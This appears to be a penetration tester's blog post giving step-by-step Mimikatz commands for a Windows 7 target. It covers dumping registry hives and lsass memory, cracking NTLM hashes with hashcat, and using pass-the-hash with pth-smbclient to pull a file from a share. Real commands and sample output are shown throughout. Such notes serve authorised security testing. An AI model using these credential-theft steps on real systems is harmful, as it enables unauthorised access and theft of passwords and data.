Mimikatz allows users to view and save authentication credentials like Kerberos tickets and Windows credentials. It’s freely available via Github. This post is not a tutorial on how to use Mimikatz, it lists the commands that I recently had to use during an assignment in an old Windows 7 environment.
Workflow : From registry
- Dump hashes from registry;
- Use this dump offline to extract the hashes with Mimikatz;
- Crack the hashes with hashcat.
Because most unaltered versions of Mimikatz are blocked by the antivirus, you can not always extract the passwords from memory on the victim machine. To overcome this problem you have to export two registry files, then copy these files to a machine under your control and do the remainder of the work on this machine.
Note that (espc. within the Windows domain) you do not always need the password, sometimes you can just re-use the hash. However sometimes you need the password to access a specific service that is linked to AD-authentication but has its own very strict lock-out policy.
Dump hives from registry
We need to export two registry hives. You need to be (local) administrator to run these commands
C:\Users\me\Desktop>reg save hklm\sam sam.hiv The operation completed successfully. C:\Users\me\Desktop>reg save hklm\system system.hiv The operation completed successfully.
This gives you the two necessary registry files. If the registry files are in use you can use the last copies that are stored in the Volume Shadow Copy.
C:\Users\me\Desktop>vssadmin list shadows Contained 1 shadow copies at creation time: 3/7/2019 7:46:39 PM
Based on the above output you can then find (adjust the path with the latest shadow copy creation time) the copies in \\localhost\C$\@GMT-2019.03.07-18.46.39
Now start Mimikatz and set the Administrator privileges
To keep track of all your commands (and their output) you should enable logging.
Now run the lsadump command in offline mode.
mimikatz # lsadump::sam /sam:sam.hiv /system:system.hiv RID : 000001f4 (500) User : Administrator Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0 RID : 000001f5 (501) User : Guest RID : 000003eb (1003) User : test Hash NTLM: a2345375a47a92754e2505132aca194b RID : 000003ec (1004) User : test2 Hash NTLM: f0873f3268072c7b1150b15670291137
Notice the hash for the Administrator (31d6cfe0d16ae931b73c59d7e0c089c0). This exact hash indicates the local admin account has been disabled. In this case we want to use the hashes for user test and user test2. Copy and paste the Hash NTLM value into a text file.
Next we have to run Hashcat to crack the passwords. This can take a very long time and should only be run on dedicated hardware (read the FAQ for more insight). For this example I used a small dictionary. You can find more dictionaries at packetstormsecurity and md5this. We start hashcat with these options
- -m 1000 : set the hash-type to NTLM ;
- -a 0 : use a dictionary as attack mode ;
- –force : ignore errors for running it on non-ideal hardware
The output (redacted below) of the hashcat command then gives you the found passwords.
a2345375a47a92754e2505132aca194b:windows f0873f3268072c7b1150b15670291137:linux Session..........: hashcat Status...........: Cracked Hash.Type........: NTLM Hash.Target......: hash.txt Candidates.#1....: computer -> keyboard
Workflow : From memory
Another method for obtaining passwords (on Windows 7 and if kb2871997 is not applied) is by reading out the plain text passwords from memory. To do this you need to dump the lsass process.
Dump the process
There are different ways for dumping the memory of a process. One way is via the Windows Task Manager.
- Start the Task Manager;
- Search for the process lsass.exe;
- Right click and choose ‘Create Dump file’.
Again start Mimikatz.
Instead of using the offline lsadump we now use sekurlsa. In the output (redacted below) you can see that Mimikatz displays the clear text password found from memory.
mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp' mimikatz # sekurlsa::logonPasswords Opening : 'lsass.dmp' file for minidump... Authentication Id : 0 ; 1081762 (00000000:001081a2) Session : Interactive from 1 User Name : test Domain : WIN7 Logon Server : WIN7 ... * Username : test * Domain : WIN7 * Password : secretpassword
On older systems you can use the pass-the-hash technique to get access to the files. On Kali do this to list the shares.
root@kali:~# pth-smbclient --pw-nt-hash -L 192.168.218.210 --user=test \\\\192.168.218.210\\c$ a2345375a47a92754e2505132aca194b Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Quarantine Disk Test Quarantine Users Disk Reconnecting with SMB1 for workgroup listing. Connection to 192.168.218.210 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Failed to connect with SMB1 -- no workgroup available
We want to explore what’s hidden in the quarantine share.
root@kali:~# pth-smbclient --pw-nt-hash --user=test \\\\192.168.218.210\\Quarantine a2345375a47a92754e2505132aca194b Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Nov 16 16:25:12 2016 .. D 0 Wed Nov 16 16:25:12 2016 CompanySecrets.txt A 4202 Wed Nov 16 18:41:33 2016 Stinger D 0 Wed Nov 16 15:33:36 2016 8362081 blocks of size 4096. 501817 blocks available smb: \> get CompanySecrets.txt getting file \CompanySecrets.txt of size 4202 as CompanySecrets.txt (1025.9 KiloBytes/sec) (average 1025.9 KiloBytes/sec)